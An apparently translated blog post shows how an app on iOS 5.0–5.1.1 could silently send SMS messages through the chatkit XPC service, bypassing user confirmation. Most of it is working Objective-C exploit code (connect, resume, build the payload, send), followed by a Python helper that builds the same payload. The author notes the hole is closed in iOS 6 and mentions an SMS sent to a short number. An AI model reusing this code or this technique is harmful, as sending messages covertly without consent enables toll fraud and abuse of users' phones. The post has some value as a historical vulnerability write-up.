
Today I will not tell you how the security system of iOS 5 works, and we will not collect crumbs of information through undocumented features. We will simply send an SMS from an application without the user's knowledge.
Very little information on the web describes the mechanics of iOS's low-level internals, and the crumbs that exist do not let you piece the whole picture together. Many header files are backed by closed source, so most steps have to be taken almost blindly. The "mother" of the mobile platform, Mac OS X, becomes the main field for experimentation.
One of the interprocess communication systems in Mac OS X is XPC. This system layer provides interprocess communication by exchanging plist-like structures and is built on libSystem and launchd. In essence, it is an interface that lets you manage processes by exchanging dictionary-shaped structures. And because iOS inherits from it, iOS 5 has this mechanism too.
You have probably already guessed what I am getting at with this introduction. Yes, iOS has system services that expose XPC interfaces, and in my example I would like to demonstrate the technique of talking to the daemon that sends SMS messages. First, however, the following must be said:
this feature is closed in iOS 6, but it works on iOS 5.0 through 5.1.1. No jailbreak, private framework or other illegitimate means are required to use it. All you need is the set of header files from the /usr/include/xpc/* directory on your Mac.
In iOS, one of the components involved in sending SMS messages is the system service com.apple.chatkit, whose tasks include composing, managing and sending short text messages. For ease of management it exposes a public communication port, com.apple.chatkit.clientcomposeserver.xpc. Through the XPC subsystem you can compose and send messages without user confirmation.
Well, let's try to create a connection.
#import <Foundation/Foundation.h>
#include <xpc/xpc.h>
#include <dispatch/dispatch.h>

xpc_connection_t myconnection;
// Queue on which the connection's event handler will run; the label is only for debugging.
dispatch_queue_t queue = dispatch_queue_create("com.apple.chatkit.clientcomposeserver.xpc",
                                               DISPATCH_QUEUE_CONCURRENT);
// Look the service up by its Mach service name. XPC_CONNECTION_MACH_SERVICE_PRIVILEGED
// asks for the instance registered in the privileged (system) launchd domain.
myconnection = xpc_connection_create_mach_service("com.apple.chatkit.clientcomposeserver.xpc",
                                                  queue,
                                                  XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
Now myconnection is an XPC connection to the SMS-sending service. However, XPC is designed so that a connection is created in a suspended ("frozen") state: to activate it, one more step is required.
xpc_connection_set_event_handler(myconnection, ^(xpc_object_t event) {
    xpc_type_t xtype = xpc_get_type(event);
    if (XPC_TYPE_ERROR == xtype) {
        // On iOS 6 this fires right away with a description saying the connection is not permitted.
        NSLog(@"XPC sandbox connection error: %s\n",
              xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
    }
});
// A freshly created connection is suspended; nothing is sent until it is resumed.
xpc_connection_resume(myconnection);
We resume the connection. On iOS 6, at this very moment you will see a message in the device log saying that this kind of interaction is prohibited. Now we need to build an xpc_dictionary with the data needed to send a message.
// Recipient list, serialized as a binary property list (the literal 200 is
// NSPropertyListBinaryFormat_v1_0); the "recipients" entry carries the serialized bytes.
NSArray *recipients = [NSArray arrayWithObjects:@"+7 (90*) 000-00-00", nil];
NSData *ser_rec = [NSPropertyListSerialization dataWithPropertyList:recipients
                                                             format:NSPropertyListBinaryFormat_v1_0
                                                            options:0
                                                              error:NULL];
xpc_object_t mydict = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(mydict, "message-type", 0);   // message type 0
xpc_dictionary_set_data(mydict, "recipients", [ser_rec bytes], [ser_rec length]);
xpc_dictionary_set_string(mydict, "text", "hello from your application!");
Only a little remains: send the message to the XPC port and make sure it has gone out.
xpc_connection_send_message(myconnection, mydict);
// The barrier block runs once every message queued before it has been sent to the service.
// That only means the service received the request, not that the SMS left the device.
xpc_connection_send_barrier(myconnection, ^{
    NSLog(@"Message has been successfully delivered");
});
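To make the payload layout concrete, here is an added Python example (not code from the original post) that builds the same message off-device: the recipients list is encoded as a binary property list, which is what NSPropertyListSerialization produces for format 200 (NSPropertyListBinaryFormat_v1_0), and the three keys mirror the xpc_dictionary above. The key names and the placeholder number come from the snippet; the validation rules and the helper names are my own.

```python
import plistlib

# Keys mirror the xpc_dictionary built in the article's snippet.
MESSAGE_TYPE_KEY = "message-type"
RECIPIENTS_KEY = "recipients"
TEXT_KEY = "text"

# Every binary plist starts with this magic; NSPropertyListSerialization
# with NSPropertyListBinaryFormat_v1_0 emits it too.
BPLIST_MAGIC = b"bplist00"


def encode_recipients(numbers):
    """Serialize a list of phone-number strings as a binary plist,
    the same encoding the article gets from format 200."""
    if not numbers or not all(isinstance(n, str) and n.strip() for n in numbers):
        raise ValueError("recipients must be a non-empty list of non-empty strings")
    return plistlib.dumps(list(numbers), fmt=plistlib.FMT_BINARY)


def decode_recipients(blob):
    """Inverse of encode_recipients; rejects anything that is not a
    binary plist holding an array of strings."""
    if not blob.startswith(BPLIST_MAGIC):
        raise ValueError("recipients blob is not a binary plist")
    value = plistlib.loads(blob, fmt=plistlib.FMT_BINARY)
    if not isinstance(value, list) or not all(isinstance(n, str) for n in value):
        raise ValueError("recipients plist must be an array of strings")
    return value


def build_compose_message(numbers, text, message_type=0):
    """Return a dict with the same keys and value types as the XPC
    dictionary: int64 message-type, data recipients, string text."""
    if not isinstance(text, str) or not text:
        raise ValueError("text must be a non-empty string")
    return {
        MESSAGE_TYPE_KEY: int(message_type),
        RECIPIENTS_KEY: encode_recipients(numbers),
        TEXT_KEY: text,
    }


def describe_message(msg):
    """Human-readable view of a message dict, decoding the recipients
    blob so the payload can be inspected before (or instead of) sending."""
    return {
        MESSAGE_TYPE_KEY: msg[MESSAGE_TYPE_KEY],
        RECIPIENTS_KEY: decode_recipients(msg[RECIPIENTS_KEY]),
        TEXT_KEY: msg[TEXT_KEY],
    }


if __name__ == "__main__":
    # Constructed sample input, using the placeholder number from the article.
    msg = build_compose_message(["+7 (90*) 000-00-00"], "hello from your application!")
    print(len(msg[RECIPIENTS_KEY]), "bytes of binary plist")
    print(describe_message(msg))
```

The decode step is the useful half when reversing: given a captured "recipients" blob from such a message, decode_recipients tells you at once whether it is the binary-plist array the service expects, and rejects XML plists or non-array payloads instead of passing them along.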
[Video in the original post: the sound of an SMS being sent to a short number.]
So, until this feature was removed in iOS 6, any application could send SMS messages without the user's knowledge. In iOS 6, Apple added an additional security layer that does not allow a sandboxed application to connect to this service.
Thanks for attention!